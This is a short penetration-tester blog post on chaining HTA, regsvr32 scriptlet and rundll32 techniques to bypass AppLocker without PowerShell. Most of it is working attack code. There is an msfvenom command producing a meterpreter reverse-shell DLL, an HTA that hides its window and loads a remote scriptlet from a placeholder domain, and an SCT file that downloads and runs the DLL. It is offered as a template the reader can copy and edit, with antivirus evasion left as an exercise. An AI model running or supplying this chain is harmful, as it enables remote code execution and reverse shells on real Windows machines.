Elliot Speck Disk Space Invader

Chaining to Bypass AppLocker Without PowerShell

One of the services we provide at work is a “human factor penetration test”, or a social engineering engagement. We position ourselves as an attacker and treat the engagement as a completely red-team exercise to attempt to gain access to the corporate environment without being provided any knowledge of the inner workings of it. Generally speaking, environments either do not have AppLocker or any form of application whitelisting enabled, and/or have PowerShell enabled for use by all users. Recently, I encountered an environment where both of these were false. Luckily (well, for an attacker), I found it was possible to chain a number of previous attacks together in order to bypass both in one fell swoop.

Generate Payload:

msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST= LPORT=443 -a x86 -f dll -o out.dll

Your .HTA file:

		<script language="VBScript">
			window.moveTo -4000, -4000
			Set objShell = CreateObject("Wscript.Shell")
			objShell.Run("regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll")

Your .SCT file:

<?XML version="1.0"?>
	<registration progid="ProgramID" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
		<script language="VBScript">
				Set FSO = CreateObject("Scripting.FileSystemObject")
				Set TMPDir = FSO.GetSpecialFolder(2)

				DLLDir = TMPDir & "\" & FSO.GetTempName()
				OutFile = DLLDir & "\" & "MSFDLL.dll"

				Dim BinaryStream

				Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
				Set ByteStream = CreateObject("ADODB.Stream")

				XMLHTTP.Open "GET", "https://your-domain.com/path/to/your/dll.dll", False

				With ByteStream
				    .Type = 1
				    .Write XMLHTTP.ResponseBody
				    .SaveToFile OutFile
				End With

				Set WSS = CreateObject("Wscript.Shell")
				WSS.Run "C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL " & OutFile, 0, true

However, some antivirii detect this, so let’s go one stage deeper and add some mitigations to their mitigations, no?




Neat, huh? Having this “just work” would be - obviously - irresponsible. While you could copy and paste this code, edit the template a touch, and push it to a server and have it work, modern antivirus will detect the HTA file as being malware. It’s an exercise for the reader as to how to mitigate this.